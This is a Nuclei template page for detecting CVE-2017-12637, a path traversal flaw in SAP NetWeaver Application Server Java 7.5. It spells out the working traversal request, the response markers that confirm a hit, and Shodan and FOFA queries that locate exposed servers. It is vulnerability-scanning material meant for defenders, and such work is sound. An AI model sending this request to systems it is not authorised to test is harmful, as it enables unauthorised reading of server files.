Skip to content
Nuclei Templates

SAP NetWeaver Application Server Java 7.5 - Local File Inclusion

ID: CVE-2017-12637

Severity: high

Author: apt-mirror

Tags: cve2017,cve,sap,lfi,java,traversal

Description

Section titled “Description”

SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.

YAML Source

Section titled “YAML Source”
id: CVE-2017-12637


info:
  name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
  author: apt-mirror
  severity: high
  description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
  remediation: |
    Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
  reference:
    - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
    - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
    - http://www.sh0w.top/index.php/archives/7/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-12637
    cwe-id: CWE-22
    epss-score: 0.00715
    epss-percentile: 0.80483
    cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver_application_server_java
    shodan-query: http.favicon.hash:-266008933
    fofa-query: icon_hash=-266008933
  tags: cve2017,cve,sap,lfi,java,traversal


http:
  - method: GET
    path:
      - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "WEB-INF"
          - "META-INF"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a00463044022065ca396225ec14093dd9b43f6b5b312d0f3383c19785a87f630294823e8bf9b60220463371cb1aadb4d7783089135c35992dffd6c75029e38f234aa6a4b04777dc59:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-12637.yaml"

View on Github